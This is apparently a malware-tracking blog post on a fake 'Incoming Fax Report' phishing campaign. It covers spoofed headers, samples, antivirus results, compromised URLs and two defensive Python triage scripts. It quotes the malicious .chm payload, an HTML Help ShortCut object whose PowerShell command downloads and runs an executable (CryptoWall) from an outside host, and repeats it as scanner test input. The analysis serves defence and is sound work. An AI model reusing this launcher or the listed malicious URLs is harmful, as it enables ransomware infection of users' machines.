

A fake incoming fax report email that claims to come from a device in your own domain, or from your own email address.

The attachment is normally a zip file containing a malicious executable (a trojan downloader or, in the 2015 run, CryptoWall). The February 2015 version uses a .chm file instead, and some versions carry a link to the malware rather than an attachment.

The headers mix spoofing of nacha.org (envelope sender) with spoofing of your own domain (From: header).


Subject: Incoming Fax Report

 *************************
INCOMING FAX REPORT
*************************

Date/Time: Tuesday, 18.02.2015
Speed: 398bps
Connection time: 07:07
Page: 7
Resolution: Normal
Remote ID: 961-748-174485
Line number: 9
DTMF/DID:
Description: Internal only
*************************

FAX-invoice.chm (17)

Subject: INCOMING FAX REPORT : Remote ID: 665-366-6868

Subject: INCOMING FAX REPORT : Remote ID: 497-577-7743 .. (etc)

****************************
INCOMING FAX REPORT
****************************

Date/Time: 06/05/2013 05:33:11 CST
Speed: 81100 bps
Connection time: 07:07
Pages: 1
Resolution: Normal
Remote ID: 665-366-6868
Line number: 665-366-6868
DTMF/DID:
Description: Сonfidential - To All Employees .pdf

****************************

CONFIDENTIALITY NOTICE:
This electronic mail transmission and any attached
files contain information intended for the exclusive
use of the individual or entity to whom it is addressed
and may contain information blah blah blah
Thank You

IncomingFax.zip (136)

Subject: INCOMING FAX REPORT : Remote ID: 984-633-6856

*******************************************
INCOMING FAX REPORT
*******************************************

Date/Time: 11/26/2013 05:14:23 EST
Speed: 07165 bps
Connection time: 08:08
Pages: 0
Resolution: Normal
Remote ID: 343-848-6365
Line number: 343-848-6365
DTMF/DID:
Description: Сost sheet for first half of 2013.pdf

******************************************
IncomingFax.zip (13)

 

....
Remote ID: 984-633-6856
Line number: 984-633-6856
DTMF/DID:
Description: New Docs.pdf
....

Header samples:

The envelope sender (X-Envelope-From) spoofs nacha.org while the From: header spoofs your own domain; some versions spoof aexp.com in the envelope instead. Neither address means anything: the Received: line shows the mail actually arriving from an unrelated host (business and residential broadband, a university, a bank's domain), and that is the signal to filter on. This campaign has been going on for a while.

Received: from asy100.as192.sol.superonline.com [212.252.192.100]
X-Envelope-From: status-update @nacha.org
From: Xerox WorkCentre <Xerox.Device3 @[your domain]>
Subject: INCOMING FAX REPORT : Remote ID: 343-848-6365

Received: from p4300.mpm.edu [192.206.48.3]
X-Envelope-From: ach-status @nacha.org
From: Xerox WorkCentre <Xerox.Device0 @[my domain].com>

Received: from ...-cpennsylvania2.hfc.comcastbusiness.net [173.163.143.130]
X-Envelope-From: noreply @nacha.org
From: Xerox WorkCentre <Xerox.Device0 @[my domain].com>

Received: from 57.190-154-84.uio.satnet.net [190.154.84.57]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device1 @[my domain].com>

Received: from ool-60390baa.static.optonline.net [96.57.11.170]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device7 @[my domain].com>

Received: from ...nnsylvania2.hfc.comcastbusiness.net [173.163.143.130]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device5 @[my domain].com>

Received: from poloniabank.com [65.219.238.34]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device8 @[my domain].com>

Received: from [208.52.162.185]
X-Envelope-From: service @nacha.org
From: Xerox WorkCentre <Xerox.Device7 @[my domain].com>

Received: from rrcs-....nys.biz.rr.com [24.213.255.214]
X-Envelope-From: service @nacha.org
From: Xerox WorkCentre <Xerox.Device6 @[my domain].com>

Received: from ...70.bstnma.fios.verizon.net [98.110.147.170]
X-Envelope-From: ach-status @nacha.org
From: Xerox WorkCentre <Xerox.Device3 @[my domain].com>

Received: from 129.196.60.178.unassigned.mundo-r.com [178.60.196.129]
X-Envelope-From: welcome @aexp.com
From: "Xerox Workcentre" <Scan0 @[my domain]>
Subject: INCOMING FAX REPORT : Remote ID: 556-988-5993

Received: from CT-PTR1.qns.it [31.221.41.181]
X-Envelope-From: welcome @aexp.com
From: "Xerox Workcentre" <Scan8 @sutc.com>
Subject: INCOMING FAX REPORT : Remote ID: 344-786-9968
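Here is an added example (not from the original post) of turning those header samples into a triage check in Python. It flags a From: address in your own domain that arrived from a host which is not one of your relays, an envelope sender domain that does not match the From: domain, and the Xerox.DeviceN / ScanN local-part pattern this campaign uses. example.com stands in for "[my domain]" and 203.0.113.10 is an assumed address for your own scanner or relay; both are assumptions. The embedded samples are three header sets quoted above with the anti-harvesting space before @ removed, plus one constructed benign scan from your own device.

```python
"""Triage checks for the spoofed "Xerox WorkCentre" fax-report headers.

Added example, not code from the original post. example.com and 203.0.113.10
are assumptions standing in for your own domain and your own relay/MFP address.
"""
import re
from email import message_from_string
from email.utils import parseaddr

OUR_DOMAIN = "example.com"         # assumption: your own domain ("[my domain]" in the post)
OUR_RELAY_IPS = {"203.0.113.10"}   # assumption: hosts allowed to hand us mail From: our domain

# "from host [ip]" or just "from [ip]" at the start of a Received: header value
RECEIVED_FROM = re.compile(r"^from\s+(?:(\S+)\s+)?\[(\d{1,3}(?:\.\d{1,3}){3})\]", re.I)
# local parts used by this campaign: Xerox.Device<N>@..., Scan<N>@...
LURE_LOCALPART = re.compile(r"^(?:xerox\.device|scan)\d+$", re.I)


def domain_of(header_value):
    """Domain part of the first address in a header value, lowercased ('' if none)."""
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


def assess(raw_headers):
    """Return a list of (code, detail) findings for one message's headers."""
    msg = message_from_string(raw_headers)
    findings = []

    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_local, _, from_dom = from_addr.rpartition("@")
    from_dom = from_dom.lower()
    env_dom = domain_of(msg.get("X-Envelope-From", ""))

    # The topmost Received: is the one your own boundary MTA wrote, so its "from"
    # names the host that actually connected to you. No Received: at all is treated
    # like an unknown host.
    received = msg.get_all("Received") or [""]
    m = RECEIVED_FROM.match(received[0])
    host, ip = (m.group(1) or "(no hostname)", m.group(2)) if m else ("?", "?")

    if from_dom == OUR_DOMAIN and ip not in OUR_RELAY_IPS:
        findings.append(("FROM_SPOOF",
                         f"From: claims {OUR_DOMAIN} but the mail came from {host} [{ip}]"))
    if env_dom and from_dom and env_dom != from_dom:
        findings.append(("MISALIGNED",
                         f"envelope sender {env_dom} != From: domain {from_dom} "
                         "(no SPF-based DMARC alignment possible)"))
    if LURE_LOCALPART.match(from_local) and "xerox" in from_name.lower():
        findings.append(("XEROX_LURE", f"campaign From: pattern {from_addr!r}"))
    return findings


# Constructed samples: three header sets from the post (space before @ removed,
# "[my domain]" replaced by example.com) plus one benign scan from our own device.
SAMPLES = [
    "\n".join([
        "Received: from asy100.as192.sol.superonline.com [212.252.192.100]",
        "X-Envelope-From: status-update@nacha.org",
        "From: Xerox WorkCentre <Xerox.Device3@example.com>",
        "Subject: INCOMING FAX REPORT : Remote ID: 343-848-6365",
    ]),
    "\n".join([
        "Received: from [208.52.162.185]",
        "X-Envelope-From: service@nacha.org",
        "From: Xerox WorkCentre <Xerox.Device7@example.com>",
    ]),
    "\n".join([
        "Received: from CT-PTR1.qns.it [31.221.41.181]",
        "X-Envelope-From: welcome@aexp.com",
        'From: "Xerox Workcentre" <Scan8@sutc.com>',
        "Subject: INCOMING FAX REPORT : Remote ID: 344-786-9968",
    ]),
    "\n".join([
        "Received: from mfp1.example.com [203.0.113.10]",
        "X-Envelope-From: scanner@example.com",
        "From: Scanner <scanner@example.com>",
        "Subject: Scanned document",
    ]),
]


def assess_all(samples=SAMPLES):
    """Finding codes for each sample, in order."""
    return [[code for code, _ in assess(s)] for s in samples]


if __name__ == "__main__":
    for sample in SAMPLES:
        for code, detail in assess(sample):
            print(f"{code:11} {detail}")
        print("---")
```

The third sample shows why the check is not tied to nacha.org: the aexp.com variant spoofing sutc.com still trips the alignment and lure rules, while the benign scanner on your own relay produces nothing.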

Malware

18 February 2015 

Attachment: malicious .chm file, FAX-invoice.chm

This is kind of neat. It turns out that in November 2014, @ithurricanept (on Twitter) demonstrated that a .chm file could be used to launch a command without any warning. Surely then, almost three months later, there's no way this would still be a problem.

Picture of ithurricanept doing POC || gtfo inb4 malware lols.

But no. Here is a fully patched Windows 8.1 getting CryptoWall 3.0. Windows Defender noticed the downloaded executable but was unable to prevent anything.

Picture of a Windows 8.1 box getting cryptowall thanks to .chm file.

The .chm file itself held a zero detection rate on VirusTotal for at least 8 hours. The current VT report is here.

Picture of the AV industry screaming I don't give a fuck with their windows down and their systems up.

The .chm file can be unpacked with 7-Zip like a .7z archive (it is a compiled HTML Help container). It consists of HTML files, graphic files, and some binary files I don't want to ever deal with.

Picture of chm file unzipped.

In this case, doc.htm contains an object like :

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1"
    value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('http://kovpro.com/putty.exe','%TEMP%\natmasla2.exe');
    (New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2.exe')">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

Which is why the target computer used PowerShell to download and execute kovpro.com/putty.exe. Nothing is being exploited here: the classid is the HTML Help ActiveX control (hhctrl.ocx), whose ShortCut command runs whatever program and arguments Item1 names, so hh.exe is doing exactly what it was asked. That makes the practical controls blocking .chm attachments at the mail gateway and stopping hh.exe from spawning cmd.exe or powershell.exe, rather than waiting for AV signatures.
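As an added example (not code from the original post), the following Python script scans HTML pulled out of a .chm for exactly this object: it looks for the hhctrl.ocx classid, requires Command=ShortCut, and reports the program, arguments and URLs found in Item1. The doc.htm content is the object quoted above, embedded as a constructed sample; point it at the files 7-Zip extracts to triage a suspicious help file offline instead of opening it in hh.exe.

```python
"""Flag the HTML Help ActiveX 'ShortCut' launcher inside files unpacked from a .chm.

Added example, not code from the original post. The sample below is the doc.htm
object quoted in the post, embedded here as a constructed input.
"""
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx); its "ShortCut" command
# starts whatever program Item1 names.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Constructed sample (raw string so the backslash in %TEMP%\natmasla2.exe survives).
SAMPLE_DOC_HTM = r"""<html><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1"
    value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('http://kovpro.com/putty.exe','%TEMP%\natmasla2.exe');
    (New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2.exe')">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
</body></html>
"""


class HHCtrlScanner(HTMLParser):
    """Collect the <PARAM> values of every <OBJECT> that instantiates hhctrl.ocx."""

    def __init__(self):
        super().__init__()
        self.objects = []    # one {param name: value} dict per HHCtrl object
        self._params = None  # params of the HHCtrl object currently open, else None

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}   # names come lowercased
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "", 1)
            self._params = {} if clsid == HHCTRL_CLSID else None
        elif tag == "param" and self._params is not None:
            self._params[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._params is not None:
            self.objects.append(self._params)
            self._params = None


def find_shortcut_launchers(html_text):
    """Return one finding per HHCtrl ShortCut object: program, arguments, URLs, Item2."""
    scanner = HHCtrlScanner()
    scanner.feed(html_text)
    scanner.close()
    findings = []
    for params in scanner.objects:
        if params.get("command", "").strip().lower() != "shortcut":
            continue
        # Item1 is "window-class,program,parameters"; the window class is empty here,
        # and the parameters keep their own commas because of maxsplit=2.
        fields = params.get("item1", "").split(",", 2)
        program = fields[1].strip() if len(fields) > 1 else ""
        args = " ".join(fields[2].split()) if len(fields) > 2 else ""
        findings.append({
            "program": program,
            "args": args,
            "urls": re.findall(r"https?://[^\s'\"()]+", args),
            # Item2 is the window message (msg,wParam,lParam) sent after launch;
            # 273 is WM_COMMAND (0x0111).
            "item2": params.get("item2", ""),
        })
    return findings


if __name__ == "__main__":
    for f in find_shortcut_launchers(SAMPLE_DOC_HTM):
        print(f"launches: {f['program']} {f['args']}")
        print("fetches:", ", ".join(f["urls"]) or "(no URL)")
```

Matching on the classid rather than on the word "powershell" is deliberate: the same object can launch any program, so the scanner reports every ShortCut and leaves judging the command line to the analyst.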

Downloaded executable: putty.exe -> natmasla2.exe (CryptoWall 3.0)

VirusTotal report 

AVG           Win32/Cryptor
Ad-Aware      Trojan.CryptoLocker.Z
Avira         TR/Dropper.Gen
BitDefender   Trojan.CryptoLocker.Z
DrWeb         Trojan.Encoder.514
ESET-NOD32    a variant of Win32/Injector.BUUD
Emsisoft      Trojan.CryptoLocker.Z (B)
F-Secure      Trojan.CryptoLocker.Z
GData         Trojan.CryptoLocker.Z

Developer metadata
Copyright Copyright (C) Distant 2001-2013
Publisher Excellent distant - www.Distant.com
Product Distant
File version 2.0.0.7
Description Affect transportation

Malwr.com report 

12 June 2014

VirusTotal report 

AntiVir               TR/Small.RTD.1
Avast                 Win32:Malware-gen
Commtouch             W32/Trojan.WKVS-9339
ESET-NOD32            Win32/TrojanDownloader.Waski.A
Emsisoft              Trojan-Downloader.Win32.Agent (A)
F-Prot                W32/Trojan3.IRP
Ikarus                Trojan-Spy.Agent
Malwarebytes          Trojan.Agent
Symantec              Downloader.Upatre
TrendMicro-HouseCall  TROJ_GEN.F0D1H00FC14

Other submitted File names:
Important Chase Private Banking Forms.scr
file-7112128_scr
latf1_did11-881721-86461.scr
Scan-29918-2873611-31.scr

Created process:
C:\WINDOWS\system32\drwtsn32 -p 1960 -e 176 -g

Malwr.com report 

Starts servers listening on 0.0.0.0:0
Performs some HTTP requests
Steals private information from local Internet browsers
Installs itself for autorun at Windows startup

HTTP GETs:
avazoo.com /wp-content/uploads/2014/06/1206in.jpeg <-- binary data file, not a jpeg

Anubis report

23 January 2014

Scan_001_683-373-8395.zip containing Scan_001_23012014.exe | VirusTotal report | Malwr.com report | File-Analyzer.net report

November 2013

IncomingFax.zip containing IncomingFax.exe | VirusTotal report | Malwr report

September 2013

Incoming_FAX_0819.exe | VirusTotal report | Malwr report

June 2013

IncomingFax.zip containing IncomingFax.exe | VirusTotal report

Malicious Link Variation:

****************************************
INCOMING FAX REPORT
****************************************

Date/Time: 09/18/2013 04:23:54 EST
Speed: 16214 bps
Connection time: 01:04
Pages: 7
Resolution: Normal
Remote ID: 3548925226
Line number: 7
DTMF/DID:
Description: August Payroll

Click here to view the file online

******************************************

The click here link goes to a compromised website like:

oakadventures.com /chimeras /index.html
agoodlookingman.com.au /lattices /index.html
31837.vws.magma.ca /environmentally /index.html
agoodlookingman.com.au /sledded /index.html
arlisnap.arlisna.org /seeking /index.html
oakadventures.com /ramona /index.html
arlisnap.arlisna.org /mummifying /index.html
kaindustries.comcastbiz.net /plagiarism /index.html
31837.vws.magma.ca /rheostats /index.html
kaindustries.comcastbiz.net /trammeled /index.html
31837.vws.magma.ca /payne /index.html

Each landing page loads three or so JavaScript files from further compromised websites:

0068421.netsolhost.com /partisanship /poached.js
ade-data.com /exuded /midyear.js
fangstudios.com /macedonian /piles.js

which in turn redirect to an exploit page like:

lesperancerenovations.com /topic /seconds-exist-foot.php

There you may find an obfuscated JavaScript ball of crap that fingerprints your Java version and so on, then serves a malicious Java applet. Some user-agents instead get 301'd somewhere benign-looking:

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Wed, 18 Sep 2013 20:35:22 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 178
Location: http://msn.com

...which is what I got for Mac, iPad, and Android.

All links reported to Google Safe Browsing / StopBadware.org. All malware binaries sent to Microsoft MPC and ClamAV.

